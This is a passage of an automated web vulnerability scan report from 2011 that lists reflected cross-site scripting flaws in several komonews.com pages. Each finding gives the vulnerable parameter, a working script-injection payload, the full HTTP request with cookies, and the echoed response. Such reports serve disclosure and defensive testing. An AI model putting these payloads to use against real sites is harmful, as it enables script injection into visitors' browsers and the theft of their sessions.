<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Steinbrenn
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/sports/116612208.html?d8f55"><script>alert(1)</script>e47ddffc89d=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.87. http://www.komonews.com/sports/116713754.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/sports/116713754.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39190"><script>alert(1)</script>7100ee4ab24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/116713754.html?39190"><script>alert(1)</script>7100ee4ab24=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55390

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   UW cruises
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/sports/116713754.html?39190"><script>alert(1)</script>7100ee4ab24=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.88. http://www.komonews.com/younews [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/younews

Issue detail

The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bdbd"><script>alert(1)</script>af961e96cd7 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /younews?cid=71571&c=y3bdbd"><script>alert(1)</script>af961e96cd7 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:14:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 87936

...[SNIP]...
<a class="nextpg" href="?cid=71571&c=y3bdbd"><script>alert(1)</script>af961e96cd7&pg=2">
...[SNIP]...

1.89. http://www.komonews.com/younews [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/younews

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90184"><script>alert(1)</script>ad8c8f43e27 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /younews?cid=7157190184"><script>alert(1)</script>ad8c8f43e27&c=y HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 23 Feb 2011 22:14:30 GMT
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:14:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 64186

...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Channel" href="http://www.komonews.com/younews?xml=y&cid=7157190184"><script>alert(1)</script>ad8c8f43e27" />
...[SNIP]...

1.90. http://www.komonews.com/younews [name of an arbitrarily supplied request parameter] previous

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/younews

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 166b0"><script>alert(1)</script>31adaeb700e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /younews?cid=71571&c=y&166b0"><script>alert(1)</script>31adaeb700e=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 23 Feb 2011 22:14:54 GMT
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:14:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 87940

...[SNIP]...
<a class="nextpg" href="?cid=71571&c=y&166b0"><script>alert(1)</script>31adaeb700e=1&pg=2">
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Sat Feb 26 08:10:45 CST 2011.